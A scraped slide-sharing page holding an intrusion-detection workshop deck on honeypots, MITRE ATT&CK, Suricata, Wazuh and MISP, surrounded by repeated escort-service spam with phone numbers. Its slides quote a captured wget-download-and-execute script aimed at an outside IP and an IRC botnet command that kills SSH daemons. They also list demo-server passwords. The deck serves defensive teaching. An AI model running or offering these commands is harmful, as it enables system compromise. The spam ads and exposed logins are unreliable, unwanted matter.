Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa  Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa  Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Servicesexy call girls service in goa
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130  Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130  Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Roomdivyansh0kumar0
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)Damian Radcliffe
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts servicesonalikaur4
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts servicevipmodelshub1
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebJames Anderson
 

Recently uploaded (20)

VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
 
Russian Call girls in Dubai +971563133746 Dubai Call girls
Russian  Call girls in Dubai +971563133746 Dubai  Call girlsRussian  Call girls in Dubai +971563133746 Dubai  Call girls
Russian Call girls in Dubai +971563133746 Dubai Call girls
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa  Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa  Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
 
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In South Ex 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In South Ex 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
 
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130  Available With RoomVIP Kolkata Call Girl Kestopur 👉 8250192130  Available With Room
VIP Kolkata Call Girl Kestopur 👉 8250192130 Available With Room
 
How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)How is AI changing journalism? (v. April 2024)
How is AI changing journalism? (v. April 2024)
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
 
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Alwarpet Phone 🍆 8250192130 👅 celebrity escorts service
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 

2023 NCIT: Introduction to Intrusion Detection

  • 3. The Plan oObjectives oAwareness about how threats are executed oImportance of knowledge driven security oThinking Process oNot focusing on specific tools** oDetection oUnderstanding Attacks oExamples oLet’s make this interactive
  • 4. We are Under Attack!
  • 5. Perspective & Context • Successful or Attempts • Example: oActual Login OR oPort scanning • Example • Actual Login AND / OR • Download & Execute payload • Other aspects • Targeted Assets, Source of Attack, Timing, Files/Artifacts
  • 6. Where does it fit? Identify Protect Detect Respond Recover NIST Cyber Security Framework (v1) 6
  • 7. Detection • Key concept in security monitoring, ”detection engineering” • Know Your Enemy • You are the target • Attacker have capabilities & motives • Provide Assurance • Important to understand the different threats and how they are executed • Detect implies • monitoring and knowing what to monitor by someone • Being alerted when something happens • Stages of attack • Drive action • Or Policy Change (POST) • MITRE ATTACK Framework
  • 8. Observing Attacks • From APNIC Community Honeynet Project
  • 9. Multiple Stages • Typical o Scanning o Initial Access o Execution o Initial infection o Actual Payload o Persistence • Architecture • Initial Host • Serving Payload • Command & Control • Managing X Target 1 Target 2 9
  • 10. Knock, Knock! Timestamp, src_ip, username_attempted, password_attempted 2022-01-13T01:05:26.128718, 117.111.1.143,root,root 2022-01-13T01:18:41.854533, 117.111.1.145,root,root 2022-01-13T05:39:01.444840, 117.111.1.250,root,root 2022-01-13T05:49:50.868138, 117.111.1.139,root,root 2022-01-13T06:24:06.955896, 117.111.1.183,root,root 2022-01-13T08:48:02.869449, 117.111.1.233,root,root 2022-01-13T11:04:05.756191, 117.111.1.168,root,root 2022-01-13T12:29:53.474695, 117.111.1.46,root,root 2022-01-13T12:57:57.219175, 117.111.1.60,root,root 2022-01-13T13:12:33.592252, 117.111.1.186,root,root 10
  • 12. Execution – The Script wget hxxp://61.177.137.133/x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 777 /var/run/tty0 ; /var/run/tty0 > /dev/null 2>&1 & wget hxxp://61.177.137.133/x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 777 /var/run/tty1 ; /var/run/tty1 > /dev/null 2>&1 & wget hxxp://61.177.137.133/x/tty2 -O /var/run/tty2 ; chmod +x /var/run/tty2 ; chmod 777 /var/run/tty2 ; /var/run/tty2 > /dev/null 2>&1 & wget hxxp://61.177.137.133/x/tty3 -O /var/run/tty3 ; chmod +x /var/run/tty3 ; chmod 777 /var/run/tty3 ; /var/run/tty3 > /dev/null 2>&1 & 12
  • 13. Communication with Command and Control Server 1. Malware Download 05/25/2021-02:14:51.304265 [**] [1:2019240:14] ET POLICY Executable and linking format (ELF) file download Over HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 71.127.148.69:80 -> 10.0.2.15:39526 2. IRC Communication 05/25/2021-02:14:53.336178 [**] [1:2000345:16] ET MALWARE IRC Nick change on non-standard port [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.0.2.15:54206 -> 202.28.32.30:8080 13
  • 14. C2 B B B B B NICK x86|x|1|919043|server USER x00 localhost localhost :2021g :IRC!IRC@0x.01 PRIVMSG x86|x|1|919043|server :.VERSION. :. 010 . 127.0.0.1 6667 : :. 005 . : :. 376 . : NICK x86|x|1|919043|server MODE x86|x|1|919043|server -xi JOIN #0x86 :777 NICK x86|x|1|919043|server MODE x86|x|1|919043|server -xi JOIN #0x86 :777 :x86|x|1|919043|server!x00@x.y.z.k JOIN :#0x86 :bot!.@. PRIVMSG #0x86 :!* SH ( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; service sshd stop ; sudo service sshd stop ; killall -9 sshd dropbear ; kill -9 `pidof sshd` `pidof dropbear` )>/dev/null 2>&1 & NOTICE bot : :0x.01 412 x86|x|1|919043|server :No text to send S ? IRC Communication (2) 14
  • 15. Adversary Tactic & Techniques • Framework / Knowledge Base of adversary tactic (goals) and techniques (the how) based on real observation • Helps the defender to have realistic threat awareness • Website https://attack.mitre.org/ • Different Focus / Views • Enterprise, Mobile, ICS • Mitigations • Groups **
  • 16. What Are The Detection Opportunities? • System / Host • Service • Disk • RAM • Network • Src/DST, Payload, Certificates • What are other important artifacts? • URLs, Binaries/Files, Hashes • What tools can we use • How can we confirm?
  • 17. Threat Intel Databases • Purpose: o Look up your own assets o Indicators that you can use to monitor (hunt) • Free & Commercial • We can use it to look things up o www.virustotal.com o https://www.dshield.org/ o Many AVs/EDRs/CTI companies have subscriptions • Community based – i.e. CERTs/CSIRT community uses MISP • https://www.misp-project.org/ • Webinar on Threat Intel Sharing • Automation https://pastebin.com/K8nGtVYt
  • 18. File Integrity Monitoring • Changes to disk • Is it authorized? What is it? o /etc/resolv.conf o New Crontab entries o Registry • What if file is deleted immediately by attacker after execution? • It can be recovered (if system is running) /proc • Activities can be observed (on system or from RAM) • What tools can we use? • AV / EDR • Centralized logging – Sysmon, filebeats + Elasticsearch + create rules + Alerting • Wazuh
  • 19. Other Activities On Host • Adding / Removing /Modifying • Users • Services • Applications • Files • Config • CPU / Process • Going Deeper *** oProfiling attacks oAttribution
  • 20. Network • Compromised host need to call home! • Detection based on content/headers of network packets o (Known) Exploits o Threat Intel o IP / Domain is Command & Control o IP is a TOR Exit node o Details in CERTIFICATEs during TSL handshake session • Network Intrusion Detection System • Packet capture / Dissector + Signature matching + threat intel • Suricata *** / Zeek • Arkime
  • 22. It’s always the DNS • DNS oIf host is looking up known malicious or suspicious domain oEven if it is block or prevented ** oDo you have visibility of the DNS • Scenario • One host compromised • DNS query to monero.miningpool.zyx • Question – is there any other host that has been compromised?
  • 23. Honeypots & Honey Tokens • How do we know if attackers are in our infrastructure? • Exploit attackers activities o Lateral movement – scan and/or connect to other services o Accessing documents, files , starting service • Honeypots o Emulate services that has no production value o Any access is suspect (no / very low false positive) o Monitor for attempts to access / exploit o Open source & Commercial solutions available • Honeytokens o Digital artifacts that has no production value o Once accessed/loaded/open we will get an alert Scan For Server Config
  • 25. Detection by Others • IPs from your network scanning/attacking other hosts on the Internet • One of your server hosting malware • Database from one of your server is on the darkweb • Stolen credentials from password stealers or botnet • Someone discover a vulnerability on your website ** • Proactively looking for these things is possible • Let other security teams, researchers notify you • But How? Haveibeenpwned.com Shodan.io
  • 27. Security.txt • Security Contact information on your website • www.yourdomain.com/security.txt • Basically information – on how to contact the security person in charge + what is the scope + PGP keys • www.securitytxt.org
  • 28. CERT/CSIRT • Dedicated team for dealing with incidents • Monitor emails • Integrate with ticketing system / Slack alert etc • Process in places for processing the report • National CERT/CSIRT would normally be contacted by other external or international teams • www.apcert.org • www.first.org • In the absence of one maybe sure you are reachable • WHOIS IP • WHOIS Domain
  • 29. Wrapping UP • Detection is a critical concept o Mitigate attack in progress o Improve security policies / Better Controls o Awareness • Implies knowledge in attacker techniques and tactics o Analysts needed! • Coverage / Visibility o Due to limitation of tech or blind spot • Detection technologies – signature based have limitations • AI? • Note: Attackers are human J • Incident Response Plan o Practice o Trusted Network • Dealing with unknown • Using MITRE Attack Framework • Allocate for regular learning / conference / sharing
  • 30. Learning More • Check out some free courses with Labs on https://academy.apnic.net oSecurity Monitoring oHoneypot o Suricata IDS 101 oThreat Intel Sharing Webinar
  • 31. Day #5 • Recap of Day #4 • Traffic light protocol • Systems / Demo o Wazuh oDFIR-IRIS (Case Management) oMISP – Community Wide Sharing • Operation Security • Moving Forward sudo shutdown –h now
  • 32. Day 4 Recap • MITRE Attack Framework • Understanding stages of attack • Break down into Tactic & Teqniques • Breack down by platform (Linux, Windows, etc) • Detection! • Mapping with groups, integration with Tools etc etc oLabs o Memory Dump & Packet Analysis o Volatility o Suricata (IDS / Packet Analysis) o Artifacts, Indicators of Compromise Extraction o academy.apnic.net o Future workshops?
  • 33. Sharing - Rules of Engagement • Important for building trust! o Need to know basis • Telling others: • How the information should be handled • Our expectation • Who can they share it with • Enforcement • By systems i.e. to prevent accidental leak • How • Label & Warning • CERT /CSIRT Community - Traffic Light Protocol (TLP)
  • 34. FIRST.org Traffic Light Protocol - https://www.first.org/tlp/
  • 35.
  • 36.
  • 37. Tools for Enabling Sharing (and Investigation) EDR / SIEM /etc / Security Monitoring Case / Incident Management INTERNAL Community Threat Sharing Platform Community Other Community Threat Sharing Platform Threat Intel DB for enrichment Analysis Engines
  • 38. Tools for Enabling Sharing (and Investigation) Wazuh DFIR-IRIS INTERNAL MISP Community Other Community Threat Sharing Platform Threat Intel DB for enrichment Analysis Engines
  • 39. Wazuh owww.wazuh.com oSIEM / EDR – Free & Open Source oFile Integrity Monitoring oAuthentication oIntegration with other tools (i.e. Suricata, Yara) oActive Respone oAgent / Agentless *** oIntegration with TI to enrich IOC (Indicators of Compromise) oOther – Vulnerability, Compliance, oAPIs – send data to other platforms
  • 40. Wazuh • File Integrity Monitoring • VirusTotal (API needed) • Suricata Alerts • Authentication • Vulnerability Management https://wazuh.honeynet.asia admin SecretPassword
  • 41. DFIR-IRIS • Track Elements observed during investigation • Collaboration - share pieces of information between analysts • Automation i.e. Enrichment of IOCs
  • 42. DFIR-IRIS • Adding Cases from investigation • Adding IOCs • Asset Link • Assigning Task • Timeline • Integration with other tools • VT / MISP for enrichment https://iris.honeynet.asia User: alice Password: FijiWorkshop2023 User: bob Password: FijiWorkshop2023
  • 43. MISP • Threat Sharing Platform for Community • Open Source and Free • Many Community Uses it • Demo • Adding Events • Adding Attributes • Other features of the tool https://misp.honeynet.asia Username: fijiworkshop@company.com FijiWorkshop2023
  • 44. Operational Security • Ethical (https://www.ethicsfirst.org) • Dealing with malicious activities and criminal infrastructure • Dedicate device / VM o Network o i.e. accidentally executing malware in the network • VPN / TOR • Anonymising IP address • Tor-project.org • Quick Demo using torify • Encryption • Email: PGP** • Other Channels • Slack, Signal, Keybase
  • 45. Moving Forward – FJ Critical Infrastructure Group • Rethink about improving your security o https://github.com/certsocietegenerale/IRM o https://ciso-ksp.kpnnet.org/framework/KSP o https://www.first.org/resources/guides/Establishing-CSIRT-v1.2.pdf • Setting up this community and group • What we need : 1. Rules of engagement (i.e TLP) and Expectations 2. Regular Activities 3. Infrastructure – web, email, servers 4. Volunteers 5. Planning for future events 6. Initiatives / Problems to address (Minimum security / Vuln) 7. Engagements • Who else should we invite and convince to join J • Who can contribute?
  • 47. Thank You Adli Wahid (LinkedIn) adli@apnic.net www.apnic.net